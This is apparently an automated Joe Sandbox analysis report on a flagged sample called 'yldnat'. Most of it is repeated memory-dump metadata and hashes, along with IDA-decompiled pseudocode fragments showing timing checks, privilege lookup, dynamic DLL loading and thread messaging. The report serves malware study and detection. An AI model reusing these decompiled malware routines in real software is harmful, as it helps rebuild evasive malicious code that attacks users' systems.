                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                        • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                        • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E00408E70(intOrPtr _a4) {
                                                        				intOrPtr _v8;
                                                        				char _v24;
                                                        				char _v284;
                                                        				char _v804;
                                                        				char _v840;
                                                        				void* __ebx;
                                                        				void* _t24;
                                                        				void* _t31;
                                                        				void* _t33;
                                                        				void* _t34;
                                                        				void* _t39;
                                                        				void* _t50;
                                                        				intOrPtr _t52;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				void* _t56;
                                                        
                                                        				_t52 = _a4;
                                                        				_t39 = 0; // executed
                                                        				_t24 = E004071C0(_t52,  &_v24); // executed
                                                        				_t54 = _t53 + 8;
                                                        				if(_t24 != 0) {
                                                        					E004073D0( &_v24,  &_v840);
                                                        					_t55 = _t54 + 8;
                                                        					do {
                                                        						E0041BEF0( &_v284, 0x104);
                                                        						E0041C560( &_v284,  &_v804);
                                                        						_t56 = _t55 + 0x10;
                                                        						_t50 = 0x4f;
                                                        						while(1) {
                                                        							_t31 = E004159E0(E00415980(_t52, _t50),  &_v284);
                                                        							_t56 = _t56 + 0x10;
                                                        							if(_t31 != 0) {
                                                        								break;
                                                        							}
                                                        							_t50 = _t50 + 1;
                                                        							if(_t50 <= 0x62) {
                                                        								continue;
                                                        							} else {
                                                        							}
                                                        							goto L8;
                                                        						}
                                                        						_t9 = _t52 + 0x18; // 0x5e14c483
                                                        						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
                                                        						_t39 = 1;
                                                        						L8:
                                                        						_t33 = E00407400( &_v24,  &_v840);
                                                        						_t55 = _t56 + 8;
                                                        					} while (_t33 != 0 && _t39 == 0);
                                                        					_push( &_v24);
                                                        					_push(_t52); // executed
                                                        					_t34 = E00407480(_t39); // executed
                                                        					if(_t39 == 0) {
                                                        						asm("rdtsc");
                                                        						asm("rdtsc");
                                                        						_v8 = _t34 - 0 + _t34;
                                                        						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
                                                        					}
                                                        					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
                                                        					_t20 = _t52 + 0x35; // 0xffff43e8
                                                        					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
                                                        					return 1;
                                                        				} else {
                                                        					return _t24;
                                                        				}
                                                        			}
                                                        0x00408e7b
                                                        0x00408e83
                                                        0x00408e85
                                                        0x00408e8a
                                                        0x00408e8f
                                                        0x00408ea2
                                                        0x00408ea7
                                                        0x00408eb0
                                                        0x00408ebc
                                                        0x00408ecf
                                                        0x00408ed4
                                                        0x00408ed7
                                                        0x00408ee0
                                                        0x00408ef2
                                                        0x00408ef7
                                                        0x00408efc
                                                        0x00000000
                                                        0x00000000
                                                        0x00408efe
                                                        0x00408f02
                                                        0x00000000
                                                        0x00000000
                                                        0x00408f04
                                                        0x00000000
                                                        0x00408f02
                                                        0x00408f06
                                                        0x00408f09
                                                        0x00408f0f
                                                        0x00408f11
                                                        0x00408f1c
                                                        0x00408f21
                                                        0x00408f24
                                                        0x00408f2f
                                                        0x00408f30
                                                        0x00408f31
                                                        0x00408f3c
                                                        0x00408f3e
                                                        0x00408f44
                                                        0x00408f48
                                                        0x00408f4b
                                                        0x00408f4b
                                                        0x00408f52
                                                        0x00408f55
                                                        0x00408f5a
                                                        0x00408f67
                                                        0x00408e96
                                                        0x00408e96
                                                        0x00408e96

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27ca8296a09ebefc98364ae91601f06ffc84b21d7e82a9254a1edf0fb0f1f047
                                                        • Instruction ID: f6d2a4ae43c0e80154541ee1f12fa55f7c3f5c6d6a8e09a367c06d0bec02e1f3
                                                        • Opcode Fuzzy Hash: 27ca8296a09ebefc98364ae91601f06ffc84b21d7e82a9254a1edf0fb0f1f047
                                                        • Instruction Fuzzy Hash: 00210CB2D4020957CB14D670DD42AEB73AC9B54308F44057FF989E3181FA387B4987A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(&QA,?,0041589F,0041589F,?,00415126,?,?,?,?,?,00000000,004090B3,?), ref: 0041A5CD
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A648
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateExitHeapProcess
                                                        • String ID: &QA
                                                        • API String ID: 1054155344-1643839059
                                                        • Opcode ID: 2b102533b8bf055206c34439dc54e66d7fe00a8a369fe2c5bf1f6105ee19a667
                                                        • Instruction ID: 99c6ee4e176d8df1f414021d3a2491ffb5ef093e05c339f36cc8711dbe6d7b5a
                                                        • Opcode Fuzzy Hash: 2b102533b8bf055206c34439dc54e66d7fe00a8a369fe2c5bf1f6105ee19a667
                                                        • Instruction Fuzzy Hash: A8F0C2B52053447BCB20EF65CC81ED77799AF45768F04844AF84C5B242C634E956CAA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 10 41a5a0-41a5d1 call 41af20 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(&QA,?,0041589F,0041589F,?,00415126,?,?,?,?,?,00000000,004090B3,?), ref: 0041A5CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: &QA
                                                        • API String ID: 1279760036-1643839059
                                                        • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                        • Instruction ID: 2a730f70d87c6ab8d876abe578f12bb998df62c6dc8c1e23a4715ed9ac41e0db
                                                        • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                        • Instruction Fuzzy Hash: EBE01AB12002046BDB14DF49DC45E9737ADAF88654F018155BA085B241C530F9108AB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 208 4075f3-4075f4 209 407634-40766c call 41bf40 call 41cb20 call 40a0e0 208->209 210 4075f6 208->210 212 40766d-40767a call 415a40 209->212 211 4075f8-407603 210->211 210->212 211->209 218 40767c-40768e PostThreadMessageW 212->218 219 4076ae-4076b2 212->219 221 407690-4076aa call 409840 218->221 222 4076ad 218->222 221->222 222->219
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 1ea0d3d9e0e4f3eb70fb3fe8c9b1ffba7b81a8bc8763de7ddbbd544b7c0a892b
                                                        • Instruction ID: f026a35aca63d969c2ce534e3b16ec01f7963c66b54c96cc342e9683c5c98b31
                                                        • Opcode Fuzzy Hash: 1ea0d3d9e0e4f3eb70fb3fe8c9b1ffba7b81a8bc8763de7ddbbd544b7c0a892b
                                                        • Instruction Fuzzy Hash: 7C010831F801287AE720A695DC43FFE77189B44B65F04453AFA00FA2C1E6A97D0647E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 235 407629-40763f 236 407648-40767a call 41cb20 call 40a0e0 call 415a40 235->236 237 407643 call 41bf40 235->237 245 40767c-40768e PostThreadMessageW 236->245 246 4076ae-4076b2 236->246 237->236 247 407690-4076aa call 409840 245->247 248 4076ad 245->248 247->248 248->246
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e5ddc434e8da6e234e1fd4322a2e39aa8af1017baf877f63009cd6e35768131a
                                                        • Instruction ID: a598b0dbbc9134c15099927b5cd9f51b64e91dad818f80e404e1b3cc3e721165
                                                        • Opcode Fuzzy Hash: e5ddc434e8da6e234e1fd4322a2e39aa8af1017baf877f63009cd6e35768131a
                                                        • Instruction Fuzzy Hash: 7501D831A802187AE730A6959C43FFE772C9F40B54F04412DFB04BA1C1D7A9790647E9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 251 407630-40763f 252 407648-40767a call 41cb20 call 40a0e0 call 415a40 251->252 253 407643 call 41bf40 251->253 261 40767c-40768e PostThreadMessageW 252->261 262 4076ae-4076b2 252->262 253->252 263 407690-4076aa call 409840 261->263 264 4076ad 261->264 263->264 264->262
                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040768A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e227a9f55e9655ffb82b1c4267eddf86497179bf27cde26b4fa5978877c83a4f
                                                        • Instruction ID: fa4d66a970e316ab97ee316df40dc40f2c28fb8d869ffdedeab5936c75815792
                                                        • Opcode Fuzzy Hash: e227a9f55e9655ffb82b1c4267eddf86497179bf27cde26b4fa5978877c83a4f
                                                        • Instruction Fuzzy Hash: 1F01A731A802287BE720A6959C43FFF776C9F44B54F04412AFF04BA1C1E6A9790647EA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 297 41a5e0-41a611 call 41af20 RtlFreeHeap
                                                        C-Code - Quality: 100%
                                                        			E0041A5E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                        				char _t10;
                                                        
                                                        				_t3 = _a4 + 0xc90; // 0xc90
                                                        				E0041AF20( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}




                                                        0x0041a5ef
                                                        0x0041a5f7
                                                        0x0041a60d
                                                        0x0041a611

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,004090B3,?,?,004090B3,00000060,00000000,00000000,?,?,004090B3,?,00000000), ref: 0041A60D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                        • Instruction ID: 464c70d3af3814a69a75cf698def59deb339e514249c01d2b25926d4b45fecd6
                                                        • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                        • Instruction Fuzzy Hash: 12E01AB12002046BD714DF49DC49EA737ADAF88754F114159B90857241C530E9108AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A740(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                        				int _t10;
                                                        
                                                        				E0041AF20( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}




                                                        0x0041a75a
                                                        0x0041a770
                                                        0x0041a774

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D562,0040D562,00000041,00000000,?,00409125), ref: 0041A770
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                        • Instruction ID: e588b84fdf650a5406be97cb40cbe76c444197855ad9c0e49af8bf90355b8ea0
                                                        • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                        • Instruction Fuzzy Hash: EDE01AB22002086BDB10DF49DC45EE737ADAF89664F018155BA0857241C530E8158AB5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A620(intOrPtr _a4, int _a8) {
                                                        
                                                        				_t5 = _a4;
                                                        				E0041AF20( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
                                                        				ExitProcess(_a8);
                                                        			}



                                                        0x0041a623
                                                        0x0041a63a
                                                        0x0041a648

                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A648
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                        • Instruction ID: 7f414ff012d9aae071d189fb1b515e73150d57ea7af78d7796793094b67a6b8c
                                                        • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                        • Instruction Fuzzy Hash: 32D017726002187BD620EB99DC89FD777ACDF457A4F0180A6BA0C6B242C934FA5187E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 82%
                                                        			E0040A0D3(signed int __eax, signed int __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
                                                        				intOrPtr _v8;
                                                        				struct _EXCEPTION_RECORD _v12;
                                                        				struct _OBJDIR_INFORMATION _v16;
                                                        				char _v540;
                                                        				void* _t22;
                                                        				struct _OBJDIR_INFORMATION _t24;
                                                        				struct _OBJDIR_INFORMATION _t25;
                                                        				void* _t44;
                                                        				void* _t46;
                                                        				void* _t47;
                                                        
                                                        				_push(es);
                                                        				asm("loopne 0x79");
                                                        				asm("out dx, eax");
                                                        				 *(__ecx + __ebx * 2 - 0x74) =  *(__ecx + __ebx * 2 - 0x74) & __eax;
                                                        				_v12 =  &_v540;
                                                        				_t22 = E0041CD70(__edi,  &_v16, 0x104, _a4);
                                                        				_t46 = _t44 - 0x214 + 0xc;
                                                        				if(_t22 != 0) {
                                                        					_t24 = E0041D190(__eflags, _v8);
                                                        					_t47 = _t46 + 4;
                                                        					__eflags = _t24;
                                                        					if(_t24 != 0) {
                                                        						E0041D410( &_v12, 0);
                                                        						_t47 = _t47 + 8;
                                                        					}
                                                        					_t25 = E0041B4C0(_v8);
                                                        					_v16 = _t25;
                                                        					__eflags = _t25;
                                                        					if(_t25 == 0) {
                                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                        						_t25 = _v16;
                                                        					}
                                                        					return _t25;
                                                        				} else {
                                                        					return _t22;
                                                        				}
                                                        			}
                                                        0x0040a0d3
                                                        0x0040a0d4
                                                        0x0040a0d6
                                                        0x0040a0dc
                                                        0x0040a0fc
                                                        0x0040a0ff
                                                        0x0040a104
                                                        0x0040a109
                                                        0x0040a113
                                                        0x0040a118
                                                        0x0040a11b
                                                        0x0040a11d
                                                        0x0040a125
                                                        0x0040a12a
                                                        0x0040a12a
                                                        0x0040a131
                                                        0x0040a139
                                                        0x0040a13c
                                                        0x0040a13e
                                                        0x0040a152
                                                        0x0040a154
                                                        0x0040a154
                                                        0x0040a15a
                                                        0x0040a10b
                                                        0x0040a10e
                                                        0x0040a10e

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A152
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_400000_yldnat.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction ID: 9633dd9c7faedaec9e0e039afaa16631705d3f6b186ad1a438174faa9559c38c
                                                        • Opcode Fuzzy Hash: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction Fuzzy Hash: 98C0C030E242049FEF10C9944C02FB833D0C3103B3F3001E76C0CDB381D4220C100290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                        • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                        • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                        • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                        • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                        • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                        • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmp
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmp
